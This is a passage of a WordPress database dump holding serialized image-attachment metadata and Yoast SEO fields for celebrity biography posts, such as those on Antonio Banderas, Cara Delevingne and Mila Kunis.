"file\";s:21:\"Amy-Adams-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1460,224,'_wp_attached_file','2015/08/Hayden-Panettiere.png'),(1461,224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:661;s:6:\"height\";i:389;s:4:\"file\";s:29:\"2015/08/Hayden-Panettiere.png\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"Hayden-Panettiere-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"Hayden-Panettiere-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-218x150.png\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-265x198.png\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-324x160.png\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-324x235.png\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-324x389.png\";s:5:\"width\";i:324;s:6:\"height\";i:389;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-356x220.png\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-356x364.png\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-533x261.png\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-534x389.png\";s:5:\"width\";i:534;s:6:\"height\";i:389;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:29:\"Hayden-Panettiere-661x385.png\";s:5:\"width\";i:661;s:6:\"height\";i:385;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1462,225,'_wp_attached_file','2015/08/Antonio-Banderas.jpg'),(1463,225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:889;s:4:\"file\";s:28:\"2015/08/Antonio-Banderas.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-300x222.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-768x569.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:569;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Antonio-Banderas-1024x759.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:759;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"Antonio-Banderas-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"Antonio-Banderas-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-696x516.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:29:\"Antonio-Banderas-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:29:\"Antonio-Banderas-1068x791.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"Antonio-Banderas-567x420.jpg\";s:5:\"width\";i:567;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:22:\"Canon EOS 300D DIGITAL\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1181588806\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1464,225,'_wp_attachment_image_alt','Antonio Banderas'),(1465,217,'_thumbnail_id','225'),(1467,217,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1468,217,'slide_template',''),(1469,217,'_yoast_wpseo_focuskw','Antonio Banderas'),(1470,217,'_yoast_wpseo_title','Antonio Banderas'),(1471,217,'_yoast_wpseo_metadesc','Antonio Banderas has made quite a name for himself in Hollywood. Learn more about the actor, his career accomplishments and personal life.'),(1472,217,'_yoast_wpseo_linkdex','85'),(1473,217,'post_views_count','213'),(1474,226,'_wp_attached_file','2015/08/Alyson-Stoner.jpg'),(1475,226,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:25:\"2015/08/Alyson-Stoner.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Alyson-Stoner-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Alyson-Stoner-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Alyson-Stoner-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1476,226,'_wp_attachment_image_alt','Alyson Stoner'),(1477,218,'_thumbnail_id','226'),(1479,218,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1480,218,'slide_template',''),(1481,218,'_yoast_wpseo_focuskw','Alyson Stoner'),(1482,218,'_yoast_wpseo_title','Alyson Stoner'),(1483,218,'_yoast_wpseo_metadesc','Alyson Stoner is a young actress and singer, with many accomplishments. Learn more about her singing and acting ventures as well as her personal life.'),(1484,218,'_yoast_wpseo_linkdex','85'),(1485,218,'post_views_count','283'),(1486,227,'_wp_attached_file','2015/08/Cara-Delevingne.jpg'),(1487,227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:458;s:4:\"file\";s:27:\"2015/08/Cara-Delevingne.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Cara-Delevingne-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Cara-Delevingne-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-534x458.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:458;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Cara-Delevingne-587x420.jpg\";s:5:\"width\";i:587;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1488,227,'_wp_attachment_image_alt','Cara Delevingne'),(1489,219,'_thumbnail_id','227'),(1491,219,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1492,219,'slide_template',''),(1493,219,'_yoast_wpseo_focuskw','Cara Delevingne'),(1494,219,'_yoast_wpseo_title','Cara Delevingne'),(1495,219,'_yoast_wpseo_metadesc','Cara Delevingne is an English model turned actress who\'s taking America by storm. Learn more about her prestigious career and personal life here.'),(1496,219,'_yoast_wpseo_linkdex','85'),(1497,219,'post_views_count','233'),(1498,228,'_wp_attached_file','2015/08/Alfred-Hitchcock.jpg'),(1499,228,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:28:\"2015/08/Alfred-Hitchcock.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"Alfred-Hitchcock-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"Alfred-Hitchcock-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"Alfred-Hitchcock-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1500,220,'_thumbnail_id','228'),(1502,220,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1503,220,'slide_template',''),(1504,220,'_yoast_wpseo_focuskw','Alfred Hitchcock'),(1505,220,'_yoast_wpseo_title','Alfred Hitchcock'),(1506,220,'_yoast_wpseo_metadesc','Alfred Hitchcock was one of the greatest directors and producers of all time. Learn more about his personal life and prestigious career.'),(1507,220,'_yoast_wpseo_linkdex','77'),(1508,220,'post_views_count','204'),(1509,229,'_wp_attached_file','2015/08/Mila-Kunis.jpg'),(1510,229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:22:\"2015/08/Mila-Kunis.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Mila-Kunis-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Mila-Kunis-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Mila-Kunis-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1511,229,'_wp_attachment_image_alt','Mila Kunis'),(1512,221,'_thumbnail_id','229'),(1513,221,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1514,221,'slide_template',''),(1515,221,'_yoast_wpseo_focuskw','Mila Kunis'),(1516,221,'_yoast_wpseo_title','Mila Kunis'),(1517,221,'_yoast_wpseo_metadesc','Mila Kunis is a well known actress. Discover more about her early life, personal life, what she is most known for and her prestigious acting career.'),(1518,221,'_yoast_wpseo_linkdex','86'),(1519,221,'post_views_count','332'),(1522,231,'_edit_lock','1444832785:6'),(1523,231,'_edit_last','6'),(1524,232,'_wp_attached_file','2015/08/jack-black.jpg'),(1525,232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:22:\"2015/08/jack-black.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"jack-black-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"jack-black-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"jack-black-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"jack-b